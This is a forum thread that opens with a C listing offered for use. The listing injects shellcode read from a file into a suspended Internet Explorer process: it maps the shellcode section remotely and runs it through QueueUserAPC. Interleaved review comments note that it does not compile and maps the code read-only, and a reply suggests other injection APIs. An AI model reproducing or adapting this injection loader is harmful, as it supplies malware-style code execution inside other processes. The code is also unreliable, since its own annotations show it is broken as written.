  1. #1
    The_USDL

    Code Injection - QueueUserAPC

    Code:
 #define _WIN32_WINNT 0x0400
            // Target API level is fixed before windows.h is pulled in.
            #include <windows.h>
 
     //Press Thanks to USDL :)
    //Press Thanks to USDL :)
    //Press Thanks to USDL :)
    
            // Minimal native-API declarations. NTSTATUS and the NT_SUCCESS test
            // (a non-negative status is success) normally come from the NT headers,
            // which this listing does not include, so they are re-declared here.
            typedef LONG NTSTATUS, *PNTSTATUS;
            #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
 
            // Inherit disposition argument of NtMapViewOfSection; ViewShare is the
            // value used by MyMapViewOfFileEx below.
            typedef enum _SECTION_INHERIT
            {
            ViewShare = 1,
            ViewUnmap = 2
            } SECTION_INHERIT;
 
 
 
            // Function-pointer type for ntdll's NtMapViewOfSection. The symbol is
            // resolved at run time with GetProcAddress in WinMain rather than being
            // linked through an import library.
            // NOTE(review): the eighth parameter is spelled `_INHERIT`, which names no
            // declared type in this listing; it looks like the SECTION_INHERIT typedef
            // above was mangled when the code was pasted. As written, this line does
            // not compile.
            typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE,
            HANDLE,
            LPVOID,
            ULONG,
            SIZE_T,
            LARGE_INTEGER*,
            SIZE_T*,
            _INHERIT,
            ULONG,
            ULONG );
 
            // Filled in by WinMain; NULL until GetProcAddress has run, and never
            // checked before use.
            func_NtMapViewOfSection NtMapViewOfSection = NULL;
     
     
     
     
     
     
     
     
     
     
            /*
             * MyMapViewOfFileEx: a MapViewOfFileEx-style wrapper around ntdll's
             * NtMapViewOfSection that takes an explicit target process handle, so
             * the view is created in hProcess rather than in the calling process.
             *
             * hProcess            process that receives the view.
             * hFileMappingObject  section handle (from CreateFileMapping in WinMain).
             * dwDesiredAccess     FILE_MAP_* flags, translated to a PAGE_* protection
             *                     below; FILE_MAP_WRITE wins over FILE_MAP_READ, which
             *                     wins over FILE_MAP_COPY.
             * dwFileOffsetHigh/
             * dwFileOffsetLow     64-bit section offset split the Win32 way.
             * dwNumberOfBytesToMap  requested view size; presumably 0 means "to the end
             *                     of the section" as with MapViewOfFileEx — confirm.
             * lpBaseAddress       requested base, or NULL to let the system choose.
             *
             * Returns the base of the new view inside hProcess, or NULL when
             * NtMapViewOfSection reports a failure. The NTSTATUS itself is dropped,
             * so the caller cannot tell why the mapping failed.
             *
             * Review note: this is the cross-process step of the listing. From a
             * defender's perspective, a file-backed section being mapped into a
             * process other than the caller is the observable event here.
             */
            LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess,
            HANDLE hFileMappingObject,
            DWORD dwDesiredAccess,
            DWORD dwFileOffsetHigh,
            DWORD dwFileOffsetLow,
            DWORD dwNumberOfBytesToMap,
            LPVOID lpBaseAddress )
            {
            NTSTATUS Status;
            LARGE_INTEGER SectionOffset;
            // NOTE(review): ViewSize is ULONG, but the function-pointer typedef
            // declares that parameter as SIZE_T*. The two types have different
            // widths on a 64-bit build, so &ViewSize does not match the prototype there.
            ULONG ViewSize;
            ULONG Protect;
            LPVOID ViewBase;
 
 
            // Convert the offset
            SectionOffset.LowPart = dwFileOffsetLow;
            SectionOffset.HighPart = dwFileOffsetHigh;
 
            // Save the size and base (both are in/out for NtMapViewOfSection, which
            // writes the chosen base and the rounded size back through the pointers)
            ViewBase = lpBaseAddress;
            ViewSize = dwNumberOfBytesToMap;
 
            // Convert flags to NT Protection Attributes
            if (dwDesiredAccess & FILE_MAP_WRITE)
            {
            Protect = PAGE_READWRITE;
            }
            else if (dwDesiredAccess & FILE_MAP_READ)
            {
            Protect = PAGE_READONLY;
            }
            else if (dwDesiredAccess & FILE_MAP_COPY)
            {
            Protect = PAGE_WRITECOPY;
            }
            else
            {
            // No recognised access bit: the view is created but unusable.
            Protect = PAGE_NOACCESS;
            }
 
            // Map the section. Argument order: SectionHandle, ProcessHandle,
            // BaseAddress (in/out), ZeroBits = 0, CommitSize = 0, SectionOffset,
            // ViewSize (in/out), InheritDisposition, AllocationType = 0, Win32Protect.
            // NtMapViewOfSection is the global resolved in WinMain; it is not
            // NULL-checked before being called.
            Status = NtMapViewOfSection(hFileMappingObject,
            hProcess,
            &ViewBase,
            0,
            0,
            &SectionOffset,
            &ViewSize,
            ViewShare,
            0,
            Protect);
            if (!NT_SUCCESS(Status))
            {
            // We failed
            return NULL;
            }
 
            // Return the base
            return ViewBase;
            }
     
     
     
     
            /*
             * WinMain: entry point of the listing.
             *
             * Sequence as written: resolve NtMapViewOfSection from ntdll, open and
             * map a file on disk read-only, start a child process suspended, map the
             * same section into that child with MyMapViewOfFileEx, queue the mapped
             * base as an APC routine on the child's primary thread, then resume it.
             *
             * Review notes:
             *  - Not one return value is checked: LoadLibrary / GetProcAddress may
             *    yield NULL, CreateFile may yield INVALID_HANDLE_VALUE, and
             *    CreateFileMapping, CreateProcess, MyMapViewOfFileEx, QueueUserAPC
             *    and ResumeThread can all fail. Each later call then runs on an
             *    invalid handle or a NULL pointer.
             *  - The view is requested with FILE_MAP_READ, which MyMapViewOfFileEx
             *    turns into PAGE_READONLY, so the APC routine address points into a
             *    non-executable mapping.
             *  - The child's path is hard-coded and locale-specific; the file name
             *    "C:\\shellcode.txt" is likewise fixed.
             *  - The parameters are unnamed, which a C++ compiler accepts but C11 does
             *    not; the listing appears to be meant for a C++ build.
             *  - hDll is never released with FreeLibrary.
             *  - From a detection standpoint the observable chain is: a process
             *    created with CREATE_SUSPENDED, a section mapped into that child from
             *    outside, QueueUserAPC on its primary thread, and ResumeThread.
             */
            int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
            {
            // Resolve the native mapping routine at run time (no NULL check).
            HMODULE hDll = LoadLibrary( "ntdll.dll" );
            NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");
            // Getting a shellcode, use whatever you want
            // The file is opened read-only with no sharing; its contents are treated
            // as raw bytes, nothing validates what is inside.
            HANDLE hFile = CreateFile ("C:\\shellcode.txt",
            GENERIC_READ,
            0,
            NULL,
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            NULL);
            // Read-only section covering the whole file (both size words are 0).
            HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);
            // Starting target process
            STARTUPINFO st;
            ZeroMemory (&st, sizeof(st));
            st.cb = sizeof (STARTUPINFO);
            PROCESS_INFORMATION pi;
            ZeroMemory (&pi, sizeof(pi));
            // CREATE_SUSPENDED: the primary thread has not run yet when the APC is
            // queued below. pi is used afterwards even if this call fails.
            CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe",
            NULL,
            NULL,
            NULL,
            FALSE,
            CREATE_SUSPENDED,
            NULL,
            NULL,
            &st,
            &pi);
            // Injecting the shellcode into target process address space
            // FILE_MAP_READ -> PAGE_READONLY inside MyMapViewOfFileEx; offset 0,
            // size 0, base chosen by the system. NULL on failure is not checked.
            LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess,
            hMappedFile,
            FILE_MAP_READ,
            0,
            0,
            0,
            NULL);
            // Create a new APC which will be executed at first when the thread resume
            // The mapped base is passed directly as the APC routine, with a NULL
            // argument; the return value is ignored.
            QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
            ResumeThread (pi.hThread);
            // Local handles are released; the view created in the child is not
            // unmapped, and hDll is never freed.
            CloseHandle (hFile);
            CloseHandle (hMappedFile);
            CloseHandle (pi.hThread);
            CloseHandle (pi.hProcess);
            return 0;
            }

    PRESS THANKS
    Last edited by The_USDL; 2012-02-08 at 07:07 PM.

  2. #2
    DatSik
    I appreciate this; could you explain a bit more? If you have time, that is — it's not a big deal, but I would like to hear what you have to say.

  3. #3
    Sirmabus

    Copy and paste? Also use the ntdll.dll version

    Did you copy and paste this from some other blog from 2007?
    远程代码注入新技术 - hackycz的日志 - 网易博客
    It's the same exact code.

    It's interesting to map a shared memory and do it this way. The more traditional way is to use VirtualAllocEx() to allocate memory in the remote process, then WriteProcessMemory() to write to it.
    You usually only need to write, but the advantage I see in using shared memory is that you could read from it directly; plus, if you need repeated access, it's faster than doing the xxxxxProcessMemory() functions.

    Also it would be better to use the internal ntdll.dll layer version "NtQueueApcThread()" instead, as QueueUserAPC() has some relevant process context stuff that might either cause it to fail or crash your target.
